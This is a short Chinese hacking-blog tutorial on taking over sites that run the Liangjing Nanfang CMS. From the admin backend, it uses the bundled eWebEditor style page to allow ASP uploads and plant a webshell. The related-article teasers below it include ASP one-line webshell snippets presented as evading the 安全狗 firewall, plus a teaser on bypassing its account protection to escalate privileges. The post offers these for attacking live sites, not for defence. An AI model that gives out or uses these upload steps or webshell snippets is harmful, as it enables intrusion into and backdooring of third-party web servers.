良精南方后台简单拿shell

hacker4年前黑客文章836

首先必须要先登入管理后台。

良精南方

进入后台管理后,在网站地址后面加上 admin/southidceditor/admin_style.asp  这是良精南方的远程编辑器路径。

如:http://www.xxx.com/admin/southidceditor/admin_style.asp 

31102002612

OK是不是看到了我们大家比较熟悉的ewebeditor编辑器界面了。

然后后面就不用多说了吧,随便找一个样式在图片那里加上 asp 点击预览,上传大马,如点击上传图片没有反应,那么就先用 *** 随便载个图,复制图片后粘贴到编辑框内。然后鼠标右键选择图片属性即可弹出上传图片框来。如下图。或者换IE浏览器。

20131102004412

马儿传完后点击查看代码,得到马儿路径。简单的拿下shell

标签: 黑客技术

相关文章

看着你的秘密——网络嗅探技术简介

 嗅探器(Sniff)是能够捕获网络报文的设备,可以理解为一个安装在计算机上的窃听设备,它可以用来窃听计算机在网络上所产生的众多的信息,今天给大家简单讲讲嗅探技术。 一、原理及分类 要了解嗅...

EnCase是不是适用全部电脑操作系统?

EnCase是不是适用全部电脑操作系统?

什么叫EnCase? EnCase通常被稽查应用,是法医鉴定手机软件,它的应用使其变成医药学中的实际上的规范之一。   EnCase是完全免费的吗? 不,EnCase并不是完全免费的,但假...

ParosProxy是不是适用全部电脑操作系统?

ParosProxy是不是适用全部电脑操作系统?

什么叫Parox Proxy? Parox Proxy是一种根据Java的Web代理商,用以评定Web程序运行中的系统漏洞。此专用工具适用查询和编写HTTP / HTTPS信息,以变更表一个字段和C...

绕过安全狗用户限制提权

绕过安全狗用户限制提权

简要描述: 你还在为有安全狗而不能添加用户而烦恼么?那快来看~只需三步,在最新服务器安全狗4.0.05221账号保护全开的状态下,我是如何用guest获取登陆权限的.前提是要有提权exp哦...

各种过安全狗一句话木马asp,php,aspx一句话

几个变性的asp–过防火墙 过狗效果都不错 <%Y=request(“x”)%> <%execute(Y)%> < %eval (eval(chr(114)+chr(...

IDAPro是不是适用全部电脑操作系统?

IDAPro是不是适用全部电脑操作系统?

什么叫IDA Pro? IDA是一个多服务平台(包含Linux)多处理器反汇编和程序调试,程序猿和开发者能够应用它来调节其程序运行。“IDA反汇编和程序调试”在评定编码失败时,早已变成一个火爆的专用...